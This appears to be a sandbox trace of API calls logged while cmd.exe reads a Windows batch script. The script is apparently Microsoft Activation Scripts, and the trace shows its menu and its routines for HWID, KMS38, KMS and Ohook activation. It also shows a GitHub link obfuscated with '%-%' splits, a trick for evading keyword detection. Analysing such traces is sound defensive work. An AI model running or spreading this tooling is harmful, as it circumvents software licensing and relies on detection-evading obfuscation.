dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n______________________________________________\r\n") returned 7 [0176.464] _get_osfhandle (_FileHandle=3) returned 0xac [0176.464] _get_osfhandle (_FileHandle=3) returned 0xac [0176.464] GetFileType (hFile=0xac) returned 0x1 [0176.464] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.464] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if not defined _MASunattended (\r\n", cbMultiByte=33, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if not defined _MASunattended (\r\n____________________\r\n") returned 33 [0176.464] _get_osfhandle (_FileHandle=3) returned 0xac [0176.464] _get_osfhandle (_FileHandle=3) returned 0xac [0176.464] GetFileType (hFile=0xac) returned 0x1 [0176.464] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.464] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo [1] Get Latest MAS\r\n", cbMultiByte=25, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo [1] Get Latest MAS\r\nnded (\r\n") returned 25 [0176.464] _get_osfhandle (_FileHandle=3) returned 0xac [0176.465] _get_osfhandle (_FileHandle=3) returned 0xac [0176.465] GetFileType (hFile=0xac) returned 0x1 [0176.465] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.465] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo [0] Continue Anyway\r\n", cbMultiByte=26, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo [0] Continue Anyway\r\nded (\r\n") returned 26 [0176.465] _get_osfhandle (_FileHandle=3) returned 0xac [0176.465] _get_osfhandle (_FileHandle=3) returned 0xac [0176.465] GetFileType (hFile=0xac) returned 0x1 [0176.465] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.465] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n] Continue Anyway\r\n") returned 7 [0176.465] _get_osfhandle (_FileHandle=3) returned 0xac [0176.465] _get_osfhandle (_FileHandle=3) returned 0xac [0176.465] GetFileType (hFile=0xac) returned 0x1 [0176.465] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.465] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="call :_color %_Green% \"Enter a menu option in the Keyboard [1,0] :\"\r\n", cbMultiByte=69, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="call :_color %_Green% \"Enter a menu option in the Keyboard [1,0] :\"\r\nfind \"127.69.%masver%\" %nul1% || set old=1))\r\n") returned 69 [0176.465] _get_osfhandle (_FileHandle=3) returned 0xac [0176.465] _get_osfhandle (_FileHandle=3) returned 0xac [0176.465] GetFileType (hFile=0xac) returned 0x1 [0176.465] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.465] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="choice /C:10 /N\r\n", cbMultiByte=17, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="choice /C:10 /N\r\neen% \"Enter a menu option in the Keyboard [1,0] :\"\r\n") returned 17 [0176.466] _get_osfhandle (_FileHandle=3) returned 0xac [0176.466] _get_osfhandle (_FileHandle=3) returned 0xac [0176.466] GetFileType (hFile=0xac) returned 0x1 [0176.466] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.466] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if !errorlevel!==2 rem\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if !errorlevel!==2 rem\r\nnter a menu option in the Keyboard [1,0] :\"\r\n") returned 24 [0176.466] _get_osfhandle (_FileHandle=3) returned 0xac [0176.466] _get_osfhandle (_FileHandle=3) returned 0xac [0176.466] GetFileType (hFile=0xac) returned 0x1 [0176.466] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.466] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if !errorlevel!==1 (start ht%-%tps://github.com/mass%-%gravel/Microsoft-Acti%-%vation-Scripts & start %mas% & exit /b)\r\n", cbMultiByte=120, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if !errorlevel!==1 (start ht%-%tps://github.com/mass%-%gravel/Microsoft-Acti%-%vation-Scripts & start %mas% & exit /b)\r\n==================\r\n") returned 120 [0176.466] _get_osfhandle (_FileHandle=3) returned 0xac [0176.466] _get_osfhandle (_FileHandle=3) returned 0xac [0176.466] GetFileType (hFile=0xac) returned 0x1 [0176.466] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.466] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")\r\n!errorlevel!==1 (start ht%-%tps://github.com/mass%-%gravel/Microsoft-Acti%-%vation-Scripts & start %mas% & exit /b)\r\n") returned 3 [0176.466] _get_osfhandle (_FileHandle=3) returned 0xac [0176.466] _get_osfhandle (_FileHandle=3) returned 0xac [0176.466] GetFileType (hFile=0xac) returned 0x1 [0176.466] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.467] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")\r\n") returned 3 [0176.467] _get_osfhandle (_FileHandle=3) returned 0xac [0176.467] _get_osfhandle (_FileHandle=3) returned 0xac [0176.467] GetFileType (hFile=0xac) returned 0x1 [0176.467] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.467] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="cls\r\n", cbMultiByte=5, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="cls\r\nrrorlevel!==1 (start ht%-%tps://github.com/mass%-%gravel/Microsoft-Acti%-%vation-Scripts & start %mas% & exit /b)\r\n") returned 5 [0176.467] _get_osfhandle (_FileHandle=3) returned 0xac [0176.467] _get_osfhandle (_FileHandle=3) returned 0xac [0176.467] GetFileType (hFile=0xac) returned 0x1 [0176.467] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.467] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\ns\r\n") returned 2 [0176.467] _get_osfhandle (_FileHandle=3) returned 0xac [0176.467] _get_osfhandle (_FileHandle=3) returned 0xac [0176.467] GetFileType (hFile=0xac) returned 0x1 [0176.467] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.467] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0176.467] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.467] _get_osfhandle (_FileHandle=3) returned 0xac [0176.467] _get_osfhandle (_FileHandle=3) returned 0xac [0176.468] GetFileType (hFile=0xac) returned 0x1 [0176.468] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.468] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0176.468] _get_osfhandle (_FileHandle=3) returned 0xac [0176.468] _get_osfhandle (_FileHandle=3) returned 0xac [0176.468] GetFileType (hFile=0xac) returned 0x1 [0176.468] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.468] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: Run script with parameters in unattended mode\r\n", cbMultiByte=51, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=":: Run script with parameters in unattended mode\r\n=======================================================================================\r\n") returned 51 [0176.468] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.468] _get_osfhandle (_FileHandle=3) returned 0xac [0176.468] _get_osfhandle (_FileHandle=3) returned 0xac [0176.468] GetFileType (hFile=0xac) returned 0x1 [0176.468] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.468] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n Run script with parameters in unattended mode\r\n") returned 2 [0176.468] _get_osfhandle (_FileHandle=3) returned 0xac [0176.468] _get_osfhandle (_FileHandle=3) returned 0xac [0176.468] GetFileType (hFile=0xac) returned 0x1 [0176.468] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.469] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _elev=\r\n", cbMultiByte=12, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set _elev=\r\npt with parameters in unattended mode\r\n") returned 12 [0176.469] _get_osfhandle (_FileHandle=3) returned 0xac [0176.469] _get_osfhandle (_FileHandle=3) returned 0xac [0176.469] GetFileType (hFile=0xac) returned 0x1 [0176.469] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.469] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if defined _args echo \"%_args%\" | find /i \"/S\" %nul% && (set \"_silent=%nul%\") || (set _silent=)\r\n", cbMultiByte=97, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if defined _args echo \"%_args%\" | find /i \"/S\" %nul% && (set \"_silent=%nul%\") || (set _silent=)\r\n=========================================\r\n") returned 97 [0176.469] _get_osfhandle (_FileHandle=3) returned 0xac [0176.469] _get_osfhandle (_FileHandle=3) returned 0xac [0176.469] GetFileType (hFile=0xac) returned 0x1 [0176.469] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.469] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if defined _args echo \"%_args%\" | find /i \"/\" %nul% && (\r\n", cbMultiByte=58, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if defined _args echo \"%_args%\" | find /i \"/\" %nul% && (\r\net \"_silent=%nul%\") || (set _silent=)\r\n") returned 58 [0176.469] _get_osfhandle (_FileHandle=3) returned 0xac [0176.470] _get_osfhandle (_FileHandle=3) returned 0xac [0176.470] GetFileType (hFile=0xac) returned 0x1 [0176.470] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.470] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo \"%_args%\" | find /i \"/HWID\" %nul% && (setlocal & cls & (call :HWIDActivation %_args% %_silent%) & endlocal)\r\n", cbMultiByte=118, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo \"%_args%\" | find /i \"/HWID\" %nul% && (setlocal & cls & (call :HWIDActivation %_args% %_silent%) & endlocal)\r\n====================\r\n") returned 118 [0176.470] _get_osfhandle (_FileHandle=3) returned 0xac [0176.470] _get_osfhandle (_FileHandle=3) returned 0xac [0176.470] GetFileType (hFile=0xac) returned 0x1 [0176.470] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.470] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo \"%_args%\" | find /i \"/KMS38\" %nul% && (setlocal & cls & (call :KMS38Activation %_args% %_silent%) & endlocal)\r\n", cbMultiByte=118, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo \"%_args%\" | find /i \"/KMS38\" %nul% && (setlocal & cls & (call :KMS38Activation %_args% %_silent%) & endlocal)\r\n") returned 118 [0176.470] _get_osfhandle (_FileHandle=3) returned 0xac [0176.470] _get_osfhandle (_FileHandle=3) returned 0xac [0176.470] GetFileType (hFile=0xac) returned 0x1 [0176.470] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.470] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo \"%_args%\" | find /i \"/KMS-\" %nul% && (setlocal & cls & (call :KMSActivation %_args% %_silent%) & endlocal)\r\n", cbMultiByte=118, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo \"%_args%\" | find /i \"/KMS-\" %nul% && (setlocal & cls & (call :KMSActivation %_args% %_silent%) & endlocal)\r\n") returned 118 [0176.470] _get_osfhandle (_FileHandle=3) returned 0xac [0176.470] _get_osfhandle (_FileHandle=3) returned 0xac [0176.470] GetFileType (hFile=0xac) returned 0x1 [0176.471] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.471] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo \"%_args%\" | find /i \"/Ohook\" %nul% && (setlocal & cls & (call :OhookActivation %_args% %_silent%) & endlocal)\r\n", cbMultiByte=118, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo \"%_args%\" | find /i \"/Ohook\" %nul% && (setlocal & cls & (call :OhookActivation %_args% %_silent%) & endlocal)\r\n") returned 118 [0176.471] _get_osfhandle (_FileHandle=3) returned 0xac [0176.471] _get_osfhandle (_FileHandle=3) returned 0xac [0176.471] GetFileType (hFile=0xac) returned 0x1 [0176.471] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.471] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="exit /b\r\n", cbMultiByte=9, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="exit /b\r\nrgs%\" | find /i \"/Ohook\" %nul% && (setlocal & cls & (call :OhookActivation %_args% %_silent%) & endlocal)\r\n") returned 9 [0176.471] _get_osfhandle (_FileHandle=3) returned 0xac [0176.471] _get_osfhandle (_FileHandle=3) returned 0xac [0176.471] GetFileType (hFile=0xac) returned 0x1 [0176.471] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.471] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")\r\nt /b\r\n") returned 3 [0176.471] _get_osfhandle (_FileHandle=3) returned 0xac [0176.471] _get_osfhandle (_FileHandle=3) returned 0xac [0176.471] GetFileType (hFile=0xac) returned 0x1 [0176.471] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.471] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n\n") returned 2 [0176.471] _get_osfhandle (_FileHandle=3) returned 0xac [0176.471] _get_osfhandle (_FileHandle=3) returned 0xac [0176.471] GetFileType (hFile=0xac) returned 0x1 [0176.471] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.472] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0176.472] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.472] _get_osfhandle (_FileHandle=3) returned 0xac [0176.472] _get_osfhandle (_FileHandle=3) returned 0xac [0176.472] GetFileType (hFile=0xac) returned 0x1 [0176.472] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.472] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0176.472] _get_osfhandle (_FileHandle=3) returned 0xac [0176.472] _get_osfhandle (_FileHandle=3) returned 0xac [0176.472] GetFileType (hFile=0xac) returned 0x1 [0176.472] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.472] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="setlocal DisableDelayedExpansion\r\n", cbMultiByte=34, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="setlocal DisableDelayedExpansion\r\n========================================================================================================\r\n") returned 34 [0176.472] _get_osfhandle (_FileHandle=3) returned 0xac [0176.472] _get_osfhandle (_FileHandle=3) returned 0xac [0176.472] GetFileType (hFile=0xac) returned 0x1 [0176.472] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.472] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\ntlocal DisableDelayedExpansion\r\n") returned 2 [0176.472] _get_osfhandle (_FileHandle=3) returned 0xac [0176.472] GetFileType (hFile=0xac) returned 0x1 [0176.472] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.472] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: Check desktop location\r\n", cbMultiByte=28, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=":: Check desktop location\r\nsion\r\n") returned 28 [0176.472] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.473] GetFileType (hFile=0xac) returned 0x1 [0176.473] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.473] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n Check desktop location\r\n") returned 2 [0176.473] GetFileType (hFile=0xac) returned 0x1 [0176.473] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.473] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _desktop_=\r\n", cbMultiByte=16, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set _desktop_=\r\np location\r\n") returned 16 [0176.473] GetFileType (hFile=0xac) returned 0x1 [0176.473] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.473] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="for /f \"skip=2 tokens=2*\" %%a in ('reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /v Desktop') do call set \"_desktop_=%%b\"\r\n", cbMultiByte=164, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="for /f \"skip=2 tokens=2*\" %%a in ('reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /v Desktop') do call set \"_desktop_=%%b\"\r\nWindowsPowerShell\\v1.0\\\"") returned 164 [0176.473] GetFileType (hFile=0xac) returned 0x1 [0176.473] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.473] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if not defined _desktop_ for /f \"delims=\" %%a in ('%psc% \"& {write-host $([Environment]::GetFolderPath('Desktop'))}\"') do call set \"_desktop_=%%a\"\r\n", cbMultiByte=148, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if not defined _desktop_ for /f \"delims=\" %%a in ('%psc% \"& {write-host $([Environment]::GetFolderPath('Desktop'))}\"') do call set \"_desktop_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 148 [0176.473] GetFileType (hFile=0xac) returned 0x1 [0176.473] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.473] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n not defined _desktop_ for /f 